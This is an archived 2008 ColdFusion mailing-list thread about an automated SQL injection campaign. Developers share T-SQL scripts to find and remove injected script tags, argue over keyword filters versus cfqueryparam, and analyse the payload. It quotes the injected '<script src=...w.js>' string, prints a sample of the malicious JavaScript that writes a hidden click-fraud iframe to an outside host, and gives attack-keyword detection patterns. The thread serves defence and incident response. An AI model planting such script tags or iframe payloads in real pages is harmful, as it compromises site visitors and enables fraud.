remove the text they placed in there. In the mean time, shut your site down so you don't infect your customers. ~Brad

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Kruger
07/21/2008 03:44 PM

And embedded in his code is one of the "other" ways of executing SQL - using sp_executeSQL  .... His script is better than mine I think. Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com Just an FYI... Our DBA (Ryan Cooper) took this same route and this is what he came up with. Thought I'd share this with the group on his behalf. He notes that you need to run this on each of your databases: -- start CREATE TABLE [dbo].[Infected](   [TableName] [varchar](255) NULL,   [ColumnName] [varchar](4000) NULL ); DECLARE @T nvarchar(255) DECLARE @C nvarchar(4000) DECLARE @SQL nvarchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open Table_Cursor fetch next from Table_Cursor into @T,@C while @@fetch_status = 0   begin     set @SQL = 'DECLARE @V varchar(4000); SET @V = NULL; SELECT TOP 1 @V = ' + @C + ' FROM ' + @T + ' WHERE '+@C+' LIKE ''%</title><script src="http://1.verynx.cn/w.js">;%''; IF (@V IS NOT NULL) BEGIN INSERT INTO dbo.Infected (tableName, ColumnName) VALUES ('''+@T+''','''+@C+''') END'     PRINT @SQL     EXECUTE sp_executesql @SQL     fetch next from Table_Cursor into @T,@C   END CLOSE Table_Cursor DEALLOCATE Table_Cursor -- end The hacker's hope is that you will be outputting one of those varchar fields into a webpage without escaping HTML characters.  The extra text being inserted into the database fields will include a malicious JavaScript file from another server into the webpage.  I haven't looked at the JS to see what it does, but it probably tries to load some Trojan via an active X applet or something. To clean your database, I would recommend reverse-engineering the attack to loop over your database columns and remove the text they placed in there. In the mean time, shut your site down so you don't infect your customers. ~Brad

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Che Vilnonis
07/21/2008 04:06 PM

For me, all attempts are focusing on rss.cfm. Another post said they saw sitemap.cfm being hit. Can anyone confirm any other templates that are being hit? Perhaps only 'commonly named' templates are being hit? Che

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Atkinson
07/21/2008 04:17 PM

We've been dealing with these too - to address Che's question they were crawling here for pages with query strings but not much else - as well as our implementing solutions offered here (much appreciation to all), our net. admin. simply shut down these attacks at the firewall - Sonicwall is the name of our firewall and it apparently updates every ten minutes to include defenses against things like this. Our logs are very clean now - although DB's a mess. :-)  N.A. left for the day before I got back to email but I will attempt to discover what he did and post here. HTH Mark Che Vilnonis wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Jerry Johnson
07/21/2008 04:17 PM

The attempts are based on a google search of .cfm files with parameters that can be exploited. (They have automated the page search, as well as the attack itself.) It is not a cf specific attack, but is also nailing php, asp, and .net sites. Here is a decent writeup of it all. http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx > For me, all attempts are focusing on rss.cfm. Another post said they saw > sitemap.cfm being hit. Can anyone confirm any other templates that are > being > hit? Perhaps only 'commonly named' templates are being hit? >

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Cameron Johnson
07/21/2008 04:23 PM

We got hit, and, according to the IIS logs, they hit non-standard templates in varied directories: /indexPrint.cfm /events/institute.cfm /search/TaxonomyResults.cfm /conferences/article.cfm /applications/statsmap/detail.cfm I don't see much of a pattern. Cameron >For me, all attempts are focusing on rss.cfm. Another post said they saw >sitemap.cfm being hit. Can anyone confirm any other templates that are being >hit? Perhaps only 'commonly named' templates are being hit? > >Che

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Kris Jones
07/21/2008 04:28 PM

I can confirm that many templates in our site are being hit. And they are not commonly named. -KJ > For me, all attempts are focusing on rss.cfm. Another post said they saw > sitemap.cfm being hit. Can anyone confirm any other templates that are being > hit? Perhaps only 'commonly named' templates are being hit?

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/21/2008 03:03 PM

----- Excess quoted text cut - see Original Post for more ----- For what it's worth, the specific URL that was injected in the sample I saw (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name doesn't resolve. Second, if you can restore a previous copy of the database, that might be easier. Also, I'd recommend that you identify the problem scripts that contain the vulnerability before you restore the database. Otherwise, you might have to repeat the process. Finally, you might consider implementing filtering at the web server to block long (and presumably problematic) URLs before they're even sent to CF. If you're using IIS, you can do that with the latest version of URLScan. If you're using Apache, I think mod_security will let you do this. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Kruger
07/21/2008 03:33 PM

For those of you who have been hit by this attack and who need to try something short of restoring your DB, this script will generate a series of update statements in reverse of the hack that's been going around: ----------------------------------------------------------- DECLARE @T varchar(255), @C varchar(255) DECLARE @sql varchar(4000) DECLARE @script varchar(255) /*fill in the value of the malicious script. */ select @script = '<script src="*scriptsrc"></script><!---' DECLARE Table_Cursor CURSOR FOR   SELECT a.name, b.name   FROM sysobjects a, syscolumns b   WHERE a.id = b.id AND a.xtype = 'u'   AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)     OPEN Table_Cursor       FETCH NEXT FROM Table_Cursor INTO @T, @C   WHILE (@@FETCH_STATUS = 0)     BEGIN       SELECT @sql = 'update [' + @T +'] set ['+ @C +'] = Replace(['  + @C + '],''' + @script + ''','''')'       PRINT @sql       /*uncomment this after checking the output using print */       --EXEC(@sql)     FETCH NEXT FROM Table_Cursor INTO @T, @C    END CLOSE Table_Cursor DEALLOCATE Table_Cursor ------------------------------------------------------- 1) Replace the value of @script (the select at the top) with the value of the string that's been inserted into your DB 2) Run the script AS IS - you should see a list of  "update" statements that look like this: update [**tablename] set [**columnName] = Replace([**ColumnName],'<script src="*scriptsrc"></script><!---','') Where **tablename and **columname represent actual tables/columns from your DB. You can then run the updates individually to strip out the malicious code... I also converted the update to a select to compare the values and see what the result would be on update. 3) If you are brave you can comment out the "EXEC(@sql)" line and rerun the script. Doing so will hit every table and every char column with these updates so be sure you know what you are doing. -Mark

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Heikki Heikkinen
07/21/2008 05:22 PM

Mark, Thanks for the info.  I tried this and it located the code.  I removed the comment and Executed however, the code still remains. Any help you can offer would be great! Thanks! ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Al Musella, DPM
07/23/2008 06:18 PM

One of my websites got hit.. I  always use cfqueryparam - at least for the last few years, but some old code (this website started with version 1 of CF) was still hanging around  that was unprotected. I used that scanning tool and it found about 20 unprotected querries out of about 20,000... anyway - I set up a filter in the application.cfm to watch for a few of these bad keywords..and temporarily ban those IPs.. I am getting hit a few times a minute now.. on all of the websites I run..  however, one of the owners got banned when he included  the word "Declare" in a product description:)   for this attack, I am thinking wouldn't it be wise to remove permission to use the sysobjects and syscolumns from the user I access the MS SQL server with from CF?  (In other words, I am assuming that cf does not need access to these tables - does it?) ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/23/2008 06:24 PM

however, one of the owners got banned when > he included  the word "Declare" in a product description:) Wow-- that sucks.  This is a classic reason why that sort of blocking method is in my opinoin only useful for a temproary stop gap.  It treats the symtom more than the problem and is prone to false alarms. >  for this attack, I am thinking wouldn't it be > wise to remove permission to use the sysobjects > and syscolumns from the user I access the MS SQL > server with from CF?  (In other words, I am > assuming that cf does not need access to these tables - does it?) > I would absolutely recommend removing permissions to those system tables.  I would also recommend blocking operations such as drop, grant, revoke, and alter.  If you have part of your application that needs that kind of functionality, it is better to create a separate datasource with escalated privileges and use it sparingly. ~Brad

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/24/2008 09:09 AM

>>This is a classic reason why that sort of blocking method is in my opinoin only useful for a temproary stop gap. It is actually only safe and useful for numeric parameters or dates, but for text fields obviously, something more accurate must be used. And CFQUERYPARAM won't help either. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andy Matthews
07/24/2008 09:18 AM

I'd be leery of simply looking for the word cast, or declare, or exec by themselves. Better to include them as part of a regular expression that also looks for semi-colons and ( like so: REFindNoCase(';.*EXEC.*\(?.*\)?',VARIABLES.qString) That looks for a ;, followed by any character (any number of times), then EXEC, followed by any character (any number of times), then 0 or 1 (, character, then finally 0 or 1 ). That's not perfect, but it's better than just looking for those keywords which could legitimately be included. One of my websites got hit.. I  always use cfqueryparam - at least for the last few years, but some old code (this website started with version 1 of CF) was still hanging around  that was unprotected. I used that scanning tool and it found about 20 unprotected querries out of about 20,000... anyway - I set up a filter in the application.cfm to watch for a few of these bad keywords..and temporarily ban those IPs.. I am getting hit a few times a minute now.. on all of the websites I run..  however, one of the owners got banned when he included  the word "Declare" in a product description:)   for this attack, I am thinking wouldn't it be wise to remove permission to use the sysobjects and syscolumns from the user I access the MS SQL server with from CF?  (In other words, I am assuming that cf does not need access to these tables - does it?) ----- Excess quoted text cut - see Original Post for more ----- around: ----- Excess quoted text cut - see Original Post for more ----- code... ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Robert Harrison
07/24/2008 09:47 AM

Add one to the list. One of my old sites just got brought down. We restored the DB and fixed it. That lasted about 15 minutes. Now, how to deal with code fixing 40 old sites that we don't get paid maintenance for. ARRRGH! Robert B. Harrison Director of Interactive services Austin & Williams 125 Kennedy Drive, Suite 100 Hauppauge NY 11788 T : 631.231.6600 Ext. 119 F : 631.434.7022 www.austin-williams.com Great advertising can't be either/or... It must be &.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Martin Schmelzle
07/23/2008 03:43 PM

Hi Dave, I have an older cf auction application that is being hit with this attack. I'm running URLScan on my win2k server running CF5 server w/ sql2k. What is the max length of URL you would recommend? Any deny verbs, headers, etc you would recommend so I can compare to my urlscan.ini. I added the script below posted on this list to my application.cfm but I think it might need to go into the aps-global.cfm... ----- Excess quoted text cut - see Original Post for more ----- Thanks, Martin ----- Excess quoted text cut - see Original Post for more -----

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 03:11 PM

For what it's worth, the specific URL that was injected in the sample I saw (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name doesn't resolve. =============== Yeah, that suck, I was going to dissect it.  It appears that DNS is resolving it to 127.0.0.1.  I didn't know you could do that.  verynx.cn resolves to 121.12.169.186, but it returns a 404 when I submit a GET for w.js.     Hmm, some off-shore joint.  "Asia Pacific Network Information Centre" owns the IP the domain resolves to.  Shows up as possibly being in Bejing, China.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/21/2008 03:27 PM

>>For what it's worth, the specific URL that was injected in the sample I saw (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name doesn't resolve. =============== Yeah, that suck, I was going to dissect it. It is broken now, but this morning I was able to see the code. Apparently all it was doing was to document.write some code containing an iFrame with an address to another Chinese site: http://ll80.com/. I've opened the site, but it is all Chinese for me ;-) -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andy Matthews
07/21/2008 03:41 PM

I took the time to save out all of the code from the JS file that was inserted. Anyone that would like this code, please contact me off list and I'll be happy to zip it up for you. >>For what it's worth, the specific URL that was injected in the sample I saw (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name doesn't resolve. =============== Yeah, that suck, I was going to dissect it. It is broken now, but this morning I was able to see the code. Apparently all it was doing was to document.write some code containing an iFrame with an address to another Chinese site: http://ll80.com/. I've opened the site, but it is all Chinese for me ;-) -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Jerry Johnson
07/21/2008 04:14 PM

I have all of the js files open and saved to a text file, fwiw, from this morning. On Mon, Jul 21, 2008 at 3:24 PM, Claude Schneegans < schneegans@internetique.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Mark Kruger
07/21/2008 03:42 PM

Brad/dave, Back when it was working the script did little more than insert a link inot the page that sent the user to a tageted "links" site/page... In other words it was a basic spam traffic generator - at least the ones on our sites. -mark Mark A. Kruger, CFG, MCSE (402) 408-3733 ext 105 www.cfwebtools.com www.coldfusionmuse.com www.necfug.com For what it's worth, the specific URL that was injected in the sample I saw (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name doesn't resolve. =============== Yeah, that suck, I was going to dissect it.  It appears that DNS is resolving it to 127.0.0.1.  I didn't know you could do that.  verynx.cn resolves to 121.12.169.186, but it returns a 404 when I submit a GET for w.js.     Hmm, some off-shore joint.  "Asia Pacific Network Information Centre" owns the IP the domain resolves to.  Shows up as possibly being in Bejing, China.

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/21/2008 03:28 PM

----- Excess quoted text cut - see Original Post for more ----- That's fine, until the attack pattern contains something else, like Unicode sequences. Figuring out what patterns to deny is a losing battle. It's much more efficent to simply allow only acceptable actions, which is what CFQUERYPARAM does. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/21/2008 03:42 PM

>>That's fine, until the attack pattern contains something else, like Unicode sequences. Not from the same address though, because it is banned now. And the purpose of my code is not to replace CFQUERYPARAM. It is to add an extra feature that will not only protect the database, but ALSO the whole site, because the guy won't be able to open any other page. >>Figuring out what patterns to deny is a losing battle. Look at what <CFQUERYPARAM CFSQLType = "CF_SQL_INTEGER "... does: It triggers an error if the parameter is not an integer. My code does exactly the same thing, PLUS it bans the intruder in case some known attack pattern is detected. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Bryan Stevenson
07/21/2008 04:04 PM

....and all hackers ALWAYS use the same IP....cause they'd never get caught that way...hehe yes...that was meant to be sarcastic ;-) I see where you're coming from Claude, I just think (as Dave appears to) that you're wasting your time....let CFQUERYPARAM do what it's meant to. Cheers -   Bryan Stevenson B.Comm. VP & Director of E-Commerce Development Electric Edge Systems Group Inc. phone: 250.480.0642 fax: 250.480.1264 cell: 250.920.8830 e-mail: bryan@electricedgesystems.com web: www.electricedgesystems.com Notice: This message, including any attachments, is confidential and may contain information that is privileged or exempt from disclosure. It is intended only for the person to whom it is addressed unless expressly authorized otherwise by the sender. If you are not an authorized recipient, please notify the sender immediately and permanently destroy all copies of this message and attachments. On Mon, 2008-07-21 at 15:39 -0400, Claude Schneegans wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/21/2008 04:41 PM

>>.....and all hackers ALWAYS use the same IP....cause they'd never get >>caught that way...hehe >>yes...that was meant to be sarcastic It does not look sarcastic to me, just may be a little retarded ;-) >>I see where you're coming from Claude, I just think (as Dave appears to) that you're wasting your time.... I'm not waisting my time, I'm saving my server time. At a certain time I use to have many errors in the "server too busy" or "memory error" category. I also discovered that a huge amount of the traffic on my server was due to robots, so I decided to control more specifically this traffic. I first optimized the "good robots" like Google, Yahoo, MSN etc using pertinent <meta name="revisit-after" content="n Days"> tags and other tricks. And I also tracked bad bots and fake browsers. Just look at your logs, and you'll be amazed by the amount of traffic caused by - browsers that never request images, probably bots... - "experimental robots" (I don't care if student experiment things, I just don't want to be the guinea pig) - robots that do not embed an address to explain why they are searching your sites, - robots that read all images to detect if one of them is copyrighted and illegally used (huge traffic) - Chinese robot that check if your site should be banned from China because they talk about human rights, - AND also spammers and hackers of course, ... etc. So I designed my own robot detection tools, and spam or SQL injection attempts are only extra tools I use to classify robots and just a drop in the ocean of sh%$/? I'm getting away. ;-) ... and yes, my server is much more stable now. and also, the statistics I show to my customers are realistic. Of course, I also use CFQUERYPARAM as an ultimate protection. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Bryan Stevenson
07/21/2008 06:18 PM

Ahhh...so there were other reasons for doing what you are doing....that makes much more sense. As Dave already said....I too was concerned about your solution being put forward in a security context...because it's not. It is of course a valid way to deal with server load issues you have experienced by filtering out the garbage requests before they become an errors at the query end of things. ...and no...not retarded....just tactless ;-) Cheers -   Bryan Stevenson B.Comm. VP & Director of E-Commerce Development Electric Edge Systems Group Inc. phone: 250.480.0642 fax: 250.480.1264 cell: 250.920.8830 e-mail: bryan@electricedgesystems.com web: www.electricedgesystems.com Notice: This message, including any attachments, is confidential and may contain information that is privileged or exempt from disclosure. It is intended only for the person to whom it is addressed unless expressly authorized otherwise by the sender. If you are not an authorized recipient, please notify the sender immediately and permanently destroy all copies of this message and attachments. On Mon, 2008-07-21 at 16:38 -0400, Claude Schneegans wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/21/2008 09:13 PM

>>....and no...not retarded....just tactless Your vocabulary is definitely richer than mine, may be less efficient, but richer ;-) -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/21/2008 09:50 PM

>>I too was concerned about your solution being put forward in a security context...because it's not. Yes it is. It serves two purposes: 1. check if the value is correct, and 2 detect an attack if ithe value is not correct. But if the value is not correct (a positive integer), the query is not even executed, now THAT'S security! Using CFQUERYPARAM would do only part 1. Now I could also check for a potential attack AFTER the query thrown an error. Sure. I find more efficient NOT TO run the query at all, and easier to write than using <CFTRY... <CFCATCH for every query. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/21/2008 04:07 PM

Easy.  sp_executesql The point here is, you can spend a lifetime guessing every bad way a hacker can ruin your database.  The root cause however is that your input is not bound to a parameter in your SQL statement.  Cfqueryparam closes that hole for good.  Whether you want to ban people IPs a and junk us up to you, but that can be a slipperly slope when you start banning legit people because they typed the word "execute" into a comments form. ~Brad I'm just talking about executing SQL, not SQL injection methods.

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/21/2008 04:30 PM

> Yeah, that suck, I was going to dissect it.  It appears that > DNS is resolving it to 127.0.0.1.  I didn't know you could do > that.  verynx.cn resolves to 121.12.169.186, but it returns a > 404 when I submit a GET for w.js. Here's a sample, from another .js file used: window.status=""; n=navigator.userLanguage.toUpperCase(); if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&( n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){ var cookieString = document.cookie; var start = cookieString.indexOf("dssndd="); if (start != -1){}else{ var expires = new Date(); expires.setTime(expires.getTime()+9*3600*1000); document.cookie = "dssndd=update;expires="+expires.toGMTString(); try{ document.write("<iframe src=http://lodse.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>"); } catch(e) { }; }} The URL in the iframe appears to simply redirect to msn.com. So, it looks like the purpose of the attack is click-fraud. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Che Vilnonis
07/21/2008 04:40 PM

Here's another question. Are sites that rewrite URLs (i.e., no .cfm extension in the url) more or less NOT being hit by these malbots?

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Andy Matthews
07/22/2008 09:08 AM

No, because those sites are still using the URL variables, just not visibly. andy Here's another question. Are sites that rewrite URLs (i.e., no .cfm extension in the url) more or less NOT being hit by these malbots?

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Gerald Guido
07/22/2008 09:25 AM

I saw this on the Riaforge update today. Looks like a SQL Jimmy wrapper for your site. http://portcullis.riaforge.org/ -------------------------- Portcullis is a CFC based url,form,cookie filter to help protect against SQL Injection and XSS (Cross Site Scripting) atacks. This CFC can help filter input, strip tags and escape HTML based on internal settings. It can also log attacks and temporarily block future attempts based on a set time limit. Portcullis can be installed into any ColdFusion application as a simple shared scoped singleton. 1.0.5 (7/21/2008) - Added some key words to block the popular CAST()/ASCII injection attack. Also, fixed a bug reported if ampersands are in the url string it sometimes mixes up the variable naming ------------------------------- 1.0.5 was updated yesterday. Coincidence? I think not. ;) ~G~ -- "If everything seems under control, you're not going fast enough" -- Mario Andretti

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Rick Faircloth
07/22/2008 09:48 AM

Let me just jump in with a quick question or two about this... Is this something that using cfqueryparam doesn't take care of? Is this a serious enough problem that we need to use such measures as Portcullis to defend our sites? I do see "form injection" attempts at times through forms on my clients' sites, but they've always been caught by cfqueryparam and haven't caused any problems. Rick ----- Excess quoted text cut - see Original Post for more -----

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/21/2008 04:37 PM

> Not from the same address though, because it is banned now. This appears to be a botnet-driven attack. Blocking addresses may be problematic in that case. > And the purpose of my code is not to replace CFQUERYPARAM. That's fine. My concern isn't really with you, Claude, but with people who might read your remarks and think that what you're doing is a valid substitute for CFQUERYPARAM - because it's not. > It is to add an extra feature that will not only protect the > database, but ALSO the whole site, because the guy won't be > able to open any other page. If you're using CFQUERYPARAM as well, this doesn't really add any protection to the database. If you're not, the protection it does add is far from complete. Again, that's really my concern with your proposal. > > Figuring out what patterns to deny is a losing battle. > > Look at what <CFQUERYPARAM CFSQLType = "CF_SQL_INTEGER "... does: > It triggers an error if the parameter is not an integer. > My code does exactly the same thing, PLUS it bans the > intruder in case some known attack pattern is detected. On its face, your comparison seems valid. But that's not really what CFQUERYPARAM does. Or at least, it's an incomplete description. What it does is separate data from executable code. This mechanism prevents data from being executed as code. The specific type of data is really invalid, and it'll work with any data now and in the future. It's as close to a foolproof mechanism as you're going to find. While it does validate specific data types, its real power is in this separation of data from code. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Claude Schneegans
07/21/2008 04:56 PM

>>This appears to be a botnet-driven attack. Blocking addresses may be problematic in that case. Why do you all want to interpret this as a final solution? Blocking an IP will NOT block ANY attack, it will just stop the current attack from THIS address, period. But it is safer than letting the malbot try every page it can find,... until it does find one in which CFQUERYPARAM was forgotten. >>If you're using CFQUERYPARAM as well, this doesn't really add any protection to the database. If you're not, the protection it does add is far from complete. Again, that's really my concern with your proposal. I use this method ONLY in the case an url.variable is supposed to contain an integer value. And in THAT CASE only, and for that variable only, the CFQUERYPARAM is useless, because if the variable contains anything else than a numeric, the query will never get executed anyway. CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more difficult to read, so the best is to use it only when it is really necessary. For me, using CFQUERYPARAM systematically for every parameter is as stupid as never using it at all. -- _______________________________________ REUSE CODE! Use custom tags; See http://www.contentbox.com/claude/customtags/tagstore.cfm (Please send any spam to this address: piegeacon@internetique.com) Thanks.

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Matt Quackenbush
07/21/2008 05:24 PM

Did I really just read that?  Please, someone, anyone, tell me that I didn't. Claude, you're certainly free to do what you wish to do in your own applications, so this comment is not directed to you at all. For those of you who are actually trying to learn and become better programmers/developers, please, do yourselves, your bosses, your fellow developers, and your clients a HUGE favor and completely ignore the advice of anyone that tells you not to use cfqueryparam.  If you have read this thread, or any thread like it and you're not using it, you deserve what you get. Bottom line: ***always*** use cfqueryparam.  Period.  There are no acceptable "exceptions to the rule". > CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more > difficult to read, > so the best is to use it only when it is really necessary. > For me, using CFQUERYPARAM systematically for every parameter is as stupid > as never using it at all. >

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Experienced CF Developer
07/21/2008 05:34 PM

And for those of you who take this advice and DO use cfqueryparam ***always*** make sure you NEVER use SELECT * (which you shouldn't do anyway). I inherited an application that had a ton of SELECT * all over it and no cfqueryparam tags.  Over the years I added cfqueryparam tags as I worked on the application, adding new features, and updated old ones/fixing bugs. Then I ran into a situation.  If I didn't update the SELECT * to include actual column names, and one of the column names got dropped from the table I was referencing in my SELECT query with a cfqueryparam, then BAM, the application would break.   Two hard and fast rules to live by: 1.  Use cfqueryparam - ALWAYS 2.  Use SELECT * - NEVER I'm sure someone will now provide some comment as when generalizations are usually made, someone has a dissenting opinion (to which, of course, you are fully entitled!) :) Sincerely, Dave Phillips Did I really just read that?  Please, someone, anyone, tell me that I didn't. Claude, you're certainly free to do what you wish to do in your own applications, so this comment is not directed to you at all. For those of you who are actually trying to learn and become better programmers/developers, please, do yourselves, your bosses, your fellow developers, and your clients a HUGE favor and completely ignore the advice of anyone that tells you not to use cfqueryparam.  If you have read this thread, or any thread like it and you're not using it, you deserve what you get. Bottom line: ***always*** use cfqueryparam.  Period.  There are no acceptable "exceptions to the rule". > CFQUERYPARAM is a nice and powerful feature, but it makes SQL code more > difficult to read, > so the best is to use it only when it is really necessary. > For me, using CFQUERYPARAM systematically for every parameter is as stupid > as never using it at all. >

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Adrian Lynch
07/24/2008 09:38 AM

Dear Dave Phillips, you have made a generalisation and I have a dissenting opinion ;O) I use SELECT * for quick and dirty scripts, always have done, always will do. Another way around the error is to change your SQL slightly. Throw in a line break and a different execution plan is used. No it's not ideal, but it works if you come across this problem. Adrian And for those of you who take this advice and DO use cfqueryparam ***always*** make sure you NEVER use SELECT * (which you shouldn't do anyway). I inherited an application that had a ton of SELECT * all over it and no cfqueryparam tags.  Over the years I added cfqueryparam tags as I worked on the application, adding new features, and updated old ones/fixing bugs. Then I ran into a situation.  If I didn't update the SELECT * to include actual column names, and one of the column names got dropped from the table I was referencing in my SELECT query with a cfqueryparam, then BAM, the application would break. Two hard and fast rules to live by: 1.  Use cfqueryparam - ALWAYS 2.  Use SELECT * - NEVER I'm sure someone will now provide some comment as when generalizations are usually made, someone has a dissenting opinion (to which, of course, you are fully entitled!) :) Sincerely, Dave Phillips

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Phillips
07/24/2008 10:09 AM

Adrian, Thanks - I was wondering if I was EVER going to get a dissenting opinion! ;-) I should clarify my previous statements by referring to "production level code".  I too use SELECT * when I'm doing test or development, and then, if that script is ever going to make it into production, I go back and then specify only the columns I need.   As for changing the SQL slightly, you are correct, that will force it to work again, however, if you are dealing with a production control system and you can't just 'tweak' the code without going through some sort of change control process, then it will drive you NUTS (which it probably does anyway).  The idea is that to avoid the error completely, avoid the SELECT *, and then you won't even have to touch the code at all. In our environment, when we are ready to implement a change that requires DB changes, often we put the db changes in before the code goes in (sometimes even a day or more in advance), as long as they are DB changes that won't break existing code, like 'adding columns', for example.  In our case, what happened was that we dropped a column that hadn't been in use for awhile, and everything broke because of the SELECT * and cfqueryparam.  Cfqueryparam was initially blamed, but that wasn't the real problem, of course. In any case, I made the 'generalized' statement on purpose 